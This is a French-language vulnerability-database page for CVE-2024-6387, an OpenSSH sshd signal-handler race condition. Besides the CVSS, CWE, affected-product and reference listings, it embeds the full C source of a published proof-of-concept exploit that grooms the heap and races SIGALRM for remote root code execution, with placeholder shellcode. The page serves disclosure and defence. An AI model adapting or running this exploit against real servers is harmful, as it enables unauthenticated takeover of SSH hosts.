CVE-2024-6387 : Détail

CVE-2024-6387

8.1
/
Haute
54.04%V4
Network
2024-07-01
12h37 +00:00
2025-04-24
18h35 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Openssh: regresshion - race condition in ssh allows rce/dos

A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-364 Signal Handler Race Condition
The product uses a signal handler that introduces a race condition.
CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
The product contains a concurrent code sequence that requires temporary, exclusive access to a shared resource, but a timing window exists in which the shared resource can be modified by another code sequence operating concurrently.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V3.1 8.1 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Base: Exploitabilty Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Network

The vulnerable component is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers).

Attack Complexity

This metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability.

High

successful attack depends on conditions beyond the attacker's control. That is, a successful attack cannot be accomplished at will, but requires the attacker to invest in some measurable amount of effort in preparation or execution against the vulnerable component before a successful attack can be expected.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

None

The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.

User Interaction

This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable component.

None

The vulnerable system can be exploited without interaction from any user.

Base: Scope Metrics

The Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope.

Scope

Formally, a security authority is a mechanism (e.g., an application, an operating system, firmware, a sandbox environment) that defines and enforces access control in terms of how certain subjects/actors (e.g., human users, processes) can access certain restricted objects/resources (e.g., files, CPU, memory) in a controlled manner. All the subjects and objects under the jurisdiction of a single security authority are considered to be under one security scope. If a vulnerability in a vulnerable component can affect a component which is in a different security scope than the vulnerable component, a Scope change occurs. Intuitively, whenever the impact of a vulnerability breaches a security/trust boundary and impacts components outside the security scope in which vulnerable component resides, a Scope change occurs.

Unchanged

An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority.

Base: Impact Metrics

The Impact metrics capture the effects of a successfully exploited vulnerability on the component that suffers the worst outcome that is most directly and predictably associated with the attack. Analysts should constrain impacts to a reasonable, final outcome which they are confident an attacker is able to achieve.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

High

There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

High

There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

High

There is a total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable).

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence in the description of a vulnerability.

Environmental Metrics

These metrics enable the analyst to customize the CVSS score depending on the importance of the affected IT asset to a user’s organization, measured in terms of Confidentiality, Integrity, and Availability.

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 52269

Date de publication : 2025-04-21 22h00 +00:00
Auteur : Milad karimi
EDB Vérifié : No

* Exploit Title : OpenSSH server (sshd) 9.8p1 - Race Condition * Author : Milad Karimi (Ex3ptionaL) * Date : 2025-04-16 * * Description: * Targets a signal handler race condition in OpenSSH's * server (sshd) on glibc-based Linux systems. It exploits a vulnerability * where the SIGALRM handler calls async-signal-unsafe functions, leading * to rce as root. * * Notes: * 1. Shellcode : Replace placeholder with actual payload. * 2. GLIBC_BASES : Needs adjustment for specific target systems. * 3. Timing parameters: Fine-tune based on target system responsiveness. * 4. Heap layout : Requires tweaking for different OpenSSH versions. * 5. File structure offsets: Verify for the specific glibc version. * ------------------------------------------------------------------------- */ #include <stdlib.h> #include <unistd.h> #include <time.h> #include <string.h> #include <errno.h> #include <fcntl.h> #include <stdint.h> #include <stdio.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <time.h> #define MAX_PACKET_SIZE (256 * 1024) #define LOGIN_GRACE_TIME 120 #define MAX_STARTUPS 100 #define CHUNK_ALIGN(s) (((s) + 15) & ~15) // Possible glibc base addresses (for ASLR bypass) uint64_t GLIBC_BASES[] = { 0xb7200000, 0xb7400000 }; int NUM_GLIBC_BASES = sizeof (GLIBC_BASES) / sizeof (GLIBC_BASES[0]); // Shellcode placeholder (replace with actual shellcode) unsigned char shellcode[] = "\x90\x90\x90\x90"; int setup_connection (const char *ip, int port); void send_packet (int sock, unsigned char packet_type, const unsigned char *data, size_t len); void prepare_heap (int sock); void time_final_packet (int sock, double *parsing_time); int attempt_race_condition (int sock, double parsing_time, uint64_t glibc_base); double measure_response_time (int sock, int error_type); void create_public_key_packet (unsigned char *packet, size_t size, uint64_t glibc_base); void create_fake_file_structure (unsigned char *data, size_t size, uint64_t glibc_base); void send_ssh_version (int sock); int receive_ssh_version (int sock); void send_kex_init (int sock); int receive_kex_init (int sock); int perform_ssh_handshake (int sock); int main (int argc, char *argv[]) { if (argc != 3) { fprintf (stderr, "Usage: %s <ip> <port>\n", argv[0]); exit (1); } const char *ip = argv[1]; int port = atoi (argv[2]); double parsing_time = 0; int success = 0; srand (time (NULL)); // Attempt exploitation for each possible glibc base address for (int base_idx = 0; base_idx < NUM_GLIBC_BASES && !success; base_idx++) { uint64_t glibc_base = GLIBC_BASES[base_idx]; printf ("Attempting exploitation with glibc base: 0x%lx\n", glibc_base); // The advisory mentions "~10,000 tries on average" for (int attempt = 0; attempt < 20000 && !success; attempt++) { if (attempt % 1000 == 0) { printf ("Attempt %d of 20000\n", attempt); } int sock = setup_connection (ip, port); if (sock < 0) { fprintf (stderr, "Failed to establish connection, attempt %d\n", attempt); continue; } if (perform_ssh_handshake (sock) < 0) { fprintf (stderr, "SSH handshake failed, attempt %d\n", attempt); close (sock); continue; } prepare_heap (sock); time_final_packet (sock, &parsing_time); if (attempt_race_condition (sock, parsing_time, glibc_base)) { printf ("Possible exploitation success on attempt %d with glibc " "base 0x%lx!\n", attempt, glibc_base); success = 1; break; } close (sock); usleep (100000); // 100ms delay between attempts, as mentioned in the // advisory } } return !success; } int setup_connection (const char *ip, int port) { int sock = socket (AF_INET, SOCK_STREAM, 0); if (sock < 0) { perror ("socket"); return -1; } struct sockaddr_in server_addr; memset (&server_addr, 0, sizeof (server_addr)); server_addr.sin_family = AF_INET; server_addr.sin_port = htons (port); if (inet_pton (AF_INET, ip, &server_addr.sin_addr) <= 0) { perror ("inet_pton"); close (sock); return -1; } if (connect (sock, (struct sockaddr *)&server_addr, sizeof (server_addr)) < 0) { perror ("connect"); close (sock); return -1; } // Set socket to non-blocking mode int flags = fcntl (sock, F_GETFL, 0); fcntl (sock, F_SETFL, flags | O_NONBLOCK); return sock; } void send_packet (int sock, unsigned char packet_type, const unsigned char *data, size_t len) { unsigned char packet[MAX_PACKET_SIZE]; size_t packet_len = len + 5; packet[0] = (packet_len >> 24) & 0xFF; packet[1] = (packet_len >> 16) & 0xFF; packet[2] = (packet_len >> 8) & 0xFF; packet[3] = packet_len & 0xFF; packet[4] = packet_type; memcpy (packet + 5, data, len); if (send (sock, packet, packet_len, 0) < 0) { perror ("send_packet"); } } void send_ssh_version (int sock) { const char *ssh_version = "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1\r\n"; if (send (sock, ssh_version, strlen (ssh_version), 0) < 0) { perror ("send ssh version"); } } int receive_ssh_version (int sock) { char buffer[256]; ssize_t received; do { received = recv (sock, buffer, sizeof (buffer) - 1, 0); } while (received < 0 && (errno == EWOULDBLOCK || errno == EAGAIN)); if (received > 0) { buffer[received] = '\0'; printf ("Received SSH version: %s", buffer); return 0; } else if (received == 0) { fprintf (stderr, "Connection closed while receiving SSH version\n"); } else { perror ("receive ssh version"); } return -1; } void send_kex_init (int sock) { unsigned char kexinit_payload[36] = { 0 }; send_packet (sock, 20, kexinit_payload, sizeof (kexinit_payload)); } int receive_kex_init (int sock) { unsigned char buffer[1024]; ssize_t received; do { received = recv (sock, buffer, sizeof (buffer), 0); } while (received < 0 && (errno == EWOULDBLOCK || errno == EAGAIN)); if (received > 0) { printf ("Received KEX_INIT (%zd bytes)\n", received); return 0; } else if (received == 0) { fprintf (stderr, "Connection closed while receiving KEX_INIT\n"); } else { perror ("receive kex init"); } return -1; } int perform_ssh_handshake (int sock) { send_ssh_version (sock); if (receive_ssh_version (sock) < 0) return -1; send_kex_init (sock); if (receive_kex_init (sock) < 0) return -1; return 0; } void prepare_heap (int sock) { // Packet a: Allocate and free tcache chunks for (int i = 0; i < 10; i++) { unsigned char tcache_chunk[64]; memset (tcache_chunk, 'A', sizeof (tcache_chunk)); send_packet (sock, 5, tcache_chunk, sizeof (tcache_chunk)); // These will be freed by the server, populating tcache } // Packet b: Create 27 pairs of large (~8KB) and small (320B) holes for (int i = 0; i < 27; i++) { // Allocate large chunk (~8KB) unsigned char large_hole[8192]; memset (large_hole, 'B', sizeof (large_hole)); send_packet (sock, 5, large_hole, sizeof (large_hole)); // Allocate small chunk (320B) unsigned char small_hole[320]; memset (small_hole, 'C', sizeof (small_hole)); send_packet (sock, 5, small_hole, sizeof (small_hole)); } // Packet c: Write fake headers, footers, vtable and _codecvt pointers for (int i = 0; i < 27; i++) { unsigned char fake_data[4096]; create_fake_file_structure (fake_data, sizeof (fake_data), GLIBC_BASES[0]); send_packet (sock, 5, fake_data, sizeof (fake_data)); } // Packet d: Ensure holes are in correct malloc bins (send ~256KB string) unsigned char large_string[MAX_PACKET_SIZE - 1]; memset (large_string, 'E', sizeof (large_string)); send_packet (sock, 5, large_string, sizeof (large_string)); } void create_fake_file_structure (unsigned char *data, size_t size, uint64_t glibc_base) { memset (data, 0, size); struct { void *_IO_read_ptr; void *_IO_read_end; void *_IO_read_base; void *_IO_write_base; void *_IO_write_ptr; void *_IO_write_end; void *_IO_buf_base; void *_IO_buf_end; void *_IO_save_base; void *_IO_backup_base; void *_IO_save_end; void *_markers; void *_chain; int _fileno; int _flags; int _mode; char _unused2[40]; void *_vtable_offset; } *fake_file = (void *)data; // Set _vtable_offset to 0x61 as described in the advisory fake_file->_vtable_offset = (void *)0x61; // Set up fake vtable and _codecvt pointers *(uint64_t *)(data + size - 16) = glibc_base + 0x21b740; // fake vtable (_IO_wfile_jumps) *(uint64_t *)(data + size - 8) = glibc_base + 0x21d7f8; // fake _codecvt } void time_final_packet (int sock, double *parsing_time) { double time_before = measure_response_time (sock, 1); double time_after = measure_response_time (sock, 2); *parsing_time = time_after - time_before; printf ("Estimated parsing time: %.6f seconds\n", *parsing_time); } double measure_response_time (int sock, int error_type) { unsigned char error_packet[1024]; size_t packet_size; if (error_type == 1) { // Error before sshkey_from_blob packet_size = snprintf ((char *)error_packet, sizeof (error_packet), "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3"); } else { // Error after sshkey_from_blob packet_size = snprintf ((char *)error_packet, sizeof (error_packet), "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAQQDZy9"); } struct timespec start, end; clock_gettime (CLOCK_MONOTONIC, &start); send_packet (sock, 50, error_packet, packet_size); // SSH_MSG_USERAUTH_REQUEST char response[1024]; ssize_t received; do { received = recv (sock, response, sizeof (response), 0); } while (received < 0 && (errno == EWOULDBLOCK || errno == EAGAIN)); clock_gettime (CLOCK_MONOTONIC, &end); double elapsed = (end.tv_sec - start.tv_sec) + (end.tv_nsec - start.tv_nsec) / 1e9; return elapsed; } void create_public_key_packet (unsigned char *packet, size_t size, uint64_t glibc_base) { memset (packet, 0, size); size_t offset = 0; for (int i = 0; i < 27; i++) { // malloc(~4KB) - This is for the large hole *(uint32_t *)(packet + offset) = CHUNK_ALIGN (4096); offset += CHUNK_ALIGN (4096); // malloc(304) - This is for the small hole (potential FILE structure) *(uint32_t *)(packet + offset) = CHUNK_ALIGN (304); offset += CHUNK_ALIGN (304); } // Add necessary headers for the SSH public key format memcpy (packet, "ssh-rsa ", 8); // Place shellcode in the heap via previous allocations memcpy (packet + CHUNK_ALIGN (4096) * 13 + CHUNK_ALIGN (304) * 13, shellcode, sizeof (shellcode)); // Set up the fake FILE structures within the packet for (int i = 0; i < 27; i++) { create_fake_file_structure (packet + CHUNK_ALIGN (4096) * (i + 1) + CHUNK_ALIGN (304) * i, CHUNK_ALIGN (304), glibc_base); } } int attempt_race_condition (int sock, double parsing_time, uint64_t glibc_base) { unsigned char final_packet[MAX_PACKET_SIZE]; create_public_key_packet (final_packet, sizeof (final_packet), glibc_base); // Send all but the last byte if (send (sock, final_packet, sizeof (final_packet) - 1, 0) < 0) { perror ("send final packet"); return 0; } // Precise timing for last byte struct timespec start, current; clock_gettime (CLOCK_MONOTONIC, &start); while (1) { clock_gettime (CLOCK_MONOTONIC, &current); double elapsed = (current.tv_sec - start.tv_sec) + (current.tv_nsec - start.tv_nsec) / 1e9; if (elapsed >= (LOGIN_GRACE_TIME - parsing_time - 0.001)) { // 1ms before SIGALRM if (send (sock, &final_packet[sizeof (final_packet) - 1], 1, 0) < 0) { perror ("send last byte"); return 0; } break; } } // Check for successful exploitation char response[1024]; ssize_t received = recv (sock, response, sizeof (response), 0); if (received > 0) { printf ("Received response after exploit attempt (%zd bytes)\n", received); // Analyze response to determine if we hit the "large" race window if (memcmp (response, "SSH-2.0-", 8) != 0) { printf ("Possible hit on 'large' race window\n"); return 1; } } else if (received == 0) { printf ( "Connection closed by server - possible successful exploitation\n"); return 1; } else if (errno == EWOULDBLOCK || errno == EAGAIN) { printf ("No immediate response from server - possible successful " "exploitation\n"); return 1; } else { perror ("recv"); } return 0; } int perform_exploit (const char *ip, int port) { int success = 0; double parsing_time = 0; double timing_adjustment = 0; for (int base_idx = 0; base_idx < NUM_GLIBC_BASES && !success; base_idx++) { uint64_t glibc_base = GLIBC_BASES[base_idx]; printf ("Attempting exploitation with glibc base: 0x%lx\n", glibc_base); for (int attempt = 0; attempt < 10000 && !success; attempt++) { if (attempt % 1000 == 0) { printf ("Attempt %d of 10000\n", attempt); } int sock = setup_connection (ip, port); if (sock < 0) { fprintf (stderr, "Failed to establish connection, attempt %d\n", attempt); continue; } if (perform_ssh_handshake (sock) < 0) { fprintf (stderr, "SSH handshake failed, attempt %d\n", attempt); close (sock); continue; } prepare_heap (sock); time_final_packet (sock, &parsing_time); // Implement feedback-based timing strategy parsing_time += timing_adjustment; if (attempt_race_condition (sock, parsing_time, glibc_base)) { printf ("Possible exploitation success on attempt %d with glibc " "base 0x%lx!\n", attempt, glibc_base); success = 1; // In a real exploit, we would now attempt to interact with the // shell } else { // Adjust timing based on feedback timing_adjustment += 0.00001; // Small incremental adjustment } close (sock); usleep (100000); // 100ms delay between attempts, as mentioned in the // advisory } } return success; }

Products Mentioned

Configuraton 0

Openbsd>>Openssh >> Version To (excluding) 4.4

Openbsd>>Openssh >> Version From (including) 8.6 To (excluding) 9.8

Openbsd>>Openssh >> Version 4.4

Openbsd>>Openssh >> Version 8.5

Configuraton 0

Redhat>>Openshift_container_platform >> Version 4.0

Redhat>>Enterprise_linux >> Version 9.0

Redhat>>Enterprise_linux_eus >> Version 9.4

Redhat>>Enterprise_linux_for_arm_64 >> Version 9.0_aarch64

Redhat>>Enterprise_linux_for_arm_64_eus >> Version 9.4_aarch64

Redhat>>Enterprise_linux_for_ibm_z_systems >> Version 9.0_s390x

Redhat>>Enterprise_linux_for_ibm_z_systems_eus >> Version 9.4_s390x

Redhat>>Enterprise_linux_for_power_little_endian >> Version 9.0_ppc64le

Redhat>>Enterprise_linux_for_power_little_endian_eus >> Version 9.4_ppc64le

  • Redhat>>Enterprise_linux_for_power_little_endian_eus >> Version 9.4_ppc64le (Open CPE detail)

Redhat>>Enterprise_linux_server_aus >> Version 9.4

Configuraton 0

Suse>>Linux_enterprise_micro >> Version 6.0

Configuraton 0

Debian>>Debian_linux >> Version 12.0

Configuraton 0

Canonical>>Ubuntu_linux >> Version 22.04

Canonical>>Ubuntu_linux >> Version 22.10

Canonical>>Ubuntu_linux >> Version 23.04

    Configuraton 0

    Amazon>>Linux_2023 >> Version -

      Configuraton 0

      Netapp>>E-series_santricity_os_controller >> Version From (including) 11.0.0 To (including) 11.70.2

      Netapp>>Ontap_select_deploy_administration_utility >> Version -

      Netapp>>Ontap_tools >> Version 9

        Configuraton 0

        Freebsd>>Freebsd >> Version 13.2

        Freebsd>>Freebsd >> Version 13.2

        Freebsd>>Freebsd >> Version 13.2

        Freebsd>>Freebsd >> Version 13.2

        Freebsd>>Freebsd >> Version 13.2

        Freebsd>>Freebsd >> Version 13.2

        Freebsd>>Freebsd >> Version 13.2

        Freebsd>>Freebsd >> Version 13.2

        Freebsd>>Freebsd >> Version 13.2

        Freebsd>>Freebsd >> Version 13.2

        Freebsd>>Freebsd >> Version 13.2

        Freebsd>>Freebsd >> Version 13.2

        Freebsd>>Freebsd >> Version 13.3

        Freebsd>>Freebsd >> Version 13.3

        Freebsd>>Freebsd >> Version 13.3

        Freebsd>>Freebsd >> Version 13.3

        Freebsd>>Freebsd >> Version 14.0

        Freebsd>>Freebsd >> Version 14.0

        Freebsd>>Freebsd >> Version 14.0

        Freebsd>>Freebsd >> Version 14.0

        Freebsd>>Freebsd >> Version 14.0

        Freebsd>>Freebsd >> Version 14.0

        Freebsd>>Freebsd >> Version 14.0

        Freebsd>>Freebsd >> Version 14.0

        Freebsd>>Freebsd >> Version 14.0

        Freebsd>>Freebsd >> Version 14.0

        Freebsd>>Freebsd >> Version 14.0

        Freebsd>>Freebsd >> Version 14.1

        Freebsd>>Freebsd >> Version 14.1

        Configuraton 0

        Netbsd>>Netbsd >> Version To (including) 10.0.0

        Références

        https://access.redhat.com/errata/RHSA-2024:4312
        Tags : vendor-advisory, x_refsource_REDHAT
        https://access.redhat.com/errata/RHSA-2024:4340
        Tags : vendor-advisory, x_refsource_REDHAT
        https://access.redhat.com/errata/RHSA-2024:4389
        Tags : vendor-advisory, x_refsource_REDHAT
        https://access.redhat.com/errata/RHSA-2024:4469
        Tags : vendor-advisory, x_refsource_REDHAT
        https://access.redhat.com/errata/RHSA-2024:4474
        Tags : vendor-advisory, x_refsource_REDHAT
        https://access.redhat.com/errata/RHSA-2024:4479
        Tags : vendor-advisory, x_refsource_REDHAT
        https://access.redhat.com/errata/RHSA-2024:4484
        Tags : vendor-advisory, x_refsource_REDHAT
        https://access.redhat.com/security/cve/CVE-2024-6387
        Tags : vdb-entry, x_refsource_REDHAT
        https://bugzilla.redhat.com/show_bug.cgi?id=2294604
        Tags : issue-tracking, x_refsource_REDHAT
        https://www.openssh.com/txt/release-9.8
        Tags : Release Notes, Third Party Advisory